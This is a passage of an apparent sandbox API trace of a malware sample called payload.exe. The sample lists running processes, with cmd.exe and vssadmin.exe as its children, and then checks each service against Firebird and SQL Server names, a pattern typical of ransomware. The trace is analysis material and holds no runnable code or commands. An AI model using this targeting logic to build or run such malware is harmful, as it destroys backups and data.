th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0053.926] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0053.926] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0053.926] lstrlenW (lpString="philadelphia.exe") returned 16 [0053.926] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0053.927] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0053.927] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0053.928] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0053.928] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0054.077] lstrlenW (lpString="fraud stuck.exe") returned 15 [0054.077] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0054.078] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0054.078] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0054.079] lstrlenW (lpString="attended.exe") returned 12 [0054.079] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0054.079] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0054.079] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0054.080] lstrlenW (lpString="pan physician.exe") returned 17 [0054.080] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0054.081] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0054.081] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0054.082] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0054.082] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0054.082] lstrlenW (lpString="over-celebrity.exe") returned 18 [0054.082] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0054.083] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0054.083] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0054.084] lstrlenW (lpString="payload.exe") returned 11 [0054.084] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0054.084] lstrlenW (lpString="cmd.exe") returned 7 [0054.085] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.085] lstrlenW (lpString="conhost.exe") returned 11 [0054.085] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0054.086] lstrlenW (lpString="vssadmin.exe") returned 12 [0054.086] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0054.087] lstrlenW (lpString="VSSVC.exe") returned 9 [0054.087] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.087] lstrlenW (lpString="svchost.exe") returned 11 [0054.087] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0054.088] CloseHandle (hObject=0x208) returned 1 [0054.088] Sleep (dwMilliseconds=0x1f4) [0054.758] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x625e38 [0054.758] EnumServicesStatusExW (in: hSCManager=0x625e38, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0054.758] GetLastError () returned 0xea [0054.758] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x6c08c8 [0054.759] EnumServicesStatusExW (in: hSCManager=0x625e38, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6c08c8, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6c08c8, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0054.759] CloseServiceHandle (hSCObject=0x625e38) returned 1 [0054.759] lstrlenW (lpString="Appinfo") returned 7 [0054.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0054.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0054.759] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0054.759] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0054.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0054.759] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0054.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0054.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0054.759] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0054.760] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0054.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0054.760] lstrlenW (lpString="AudioSrv") returned 8 [0054.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0054.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0054.760] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0054.760] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0054.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0054.760] lstrlenW (lpString="BFE") returned 3 [0054.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0054.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0054.760] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0054.760] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0054.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0054.760] lstrlenW (lpString="CryptSvc") returned 8 [0054.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0054.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0054.760] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0054.760] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0054.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0054.760] lstrlenW (lpString="CscService") returned 10 [0054.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0054.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0054.760] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0054.760] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0054.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0054.760] lstrlenW (lpString="DcomLaunch") returned 10 [0054.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0054.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0054.760] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0054.760] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0054.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0054.761] lstrlenW (lpString="Dhcp") returned 4 [0054.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0054.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0054.761] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0054.761] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0054.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0054.761] lstrlenW (lpString="Dnscache") returned 8 [0054.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0054.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0054.761] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0054.761] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0054.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0054.761] lstrlenW (lpString="DPS") returned 3 [0054.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0054.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0054.761] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0054.761] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0054.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0054.761] lstrlenW (lpString="eventlog") returned 8 [0054.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0054.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0054.761] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0054.761] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0054.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0054.761] lstrlenW (lpString="EventSystem") returned 11 [0054.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0054.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0054.761] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0054.761] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0054.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0054.761] lstrlenW (lpString="gpsvc") returned 5 [0054.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0054.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0054.762] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0054.762] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0054.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0054.762] lstrlenW (lpString="iphlpsvc") returned 8 [0054.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0054.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0054.762] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0054.762] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0054.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0054.762] lstrlenW (lpString="LanmanServer") returned 12 [0054.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0054.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0054.762] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0054.762] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0054.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0054.762] lstrlenW (lpString="LanmanWorkstation") returned 17 [0054.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0054.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0054.762] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0054.762] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0054.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0054.762] lstrlenW (lpString="lmhosts") returned 7 [0054.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0054.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0054.762] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0054.762] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0054.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0054.762] lstrlenW (lpString="MMCSS") returned 5 [0054.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0054.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0054.763] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0054.763] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0054.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0054.763] lstrlenW (lpString="MpsSvc") returned 6 [0054.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0054.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0054.763] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0054.763] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0054.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0054.763] lstrlenW (lpString="Netman") returned 6 [0054.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0054.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0054.763] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0054.763] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0054.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0054.763] lstrlenW (lpString="netprofm") returned 8 [0054.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0054.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0054.763] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0054.763] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0054.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0054.763] lstrlenW (lpString="NlaSvc") returned 6 [0054.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0054.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0054.763] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0054.763] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0054.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0054.763] lstrlenW (lpString="nsi") returned 3 [0054.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0054.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0054.763] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0054.763] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0054.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0054.764] lstrlenW (lpString="PcaSvc") returned 6 [0054.764] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0054.764] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0054.764] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0054.764] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0054.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0054.764] lstrlenW (lpString="PlugPlay") returned 8 [0054.764] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0054.764] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0054.764] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0054.764] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0054.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0054.764] lstrlenW (lpString="Power") returned 5 [0054.764] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0054.764] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0054.764] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0054.764] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0054.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0054.764] lstrlenW (lpString="ProfSvc") returned 7 [0054.764] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0054.764] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0054.764] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0054.764] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0054.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0054.764] lstrlenW (lpString="RpcEptMapper") returned 12 [0054.764] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0054.764] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0054.764] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0054.764] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0054.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0054.764] lstrlenW (lpString="RpcSs") returned 5 [0054.765] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0054.765] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0054.765] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0054.765] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0054.765] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0054.765] lstrlenW (lpString="SamSs") returned 5 [0054.765] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0054.765] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0054.765] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0054.765] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0054.765] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0054.765] lstrlenW (lpString="Schedule") returned 8 [0054.765] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0054.765] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0054.765] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0054.765] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0054.765] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0054.765] lstrlenW (lpString="SENS") returned 4 [0054.765] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0054.765] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0054.765] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0054.765] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0054.765] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0054.765] lstrlenW (lpString="ShellHWDetection") returned 16 [0054.765] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0054.765] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0054.765] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0054.765] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0054.765] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0054.765] lstrlenW (lpString="Spooler") returned 7 [0054.765] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0054.765] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0054.766] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0054.766] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0054.766] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0054.766] lstrlenW (lpString="swprv") returned 5 [0054.766] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0054.766] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0054.766] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0054.766] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0054.766] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0054.766] lstrlenW (lpString="SysMain") returned 7 [0054.766] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0054.766] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0054.766] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0054.766] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0054.766] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0054.766] lstrlenW (lpString="Themes") returned 6 [0054.766] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0054.766] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0054.766] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0054.766] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0054.766] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0054.766] lstrlenW (lpString="TrkWks") returned 6 [0054.766] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0054.766] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0054.766] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0054.766] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0054.766] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0054.766] lstrlenW (lpString="UxSms") returned 5 [0054.766] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0054.766] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0054.766] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0054.767] lstrcmpiW 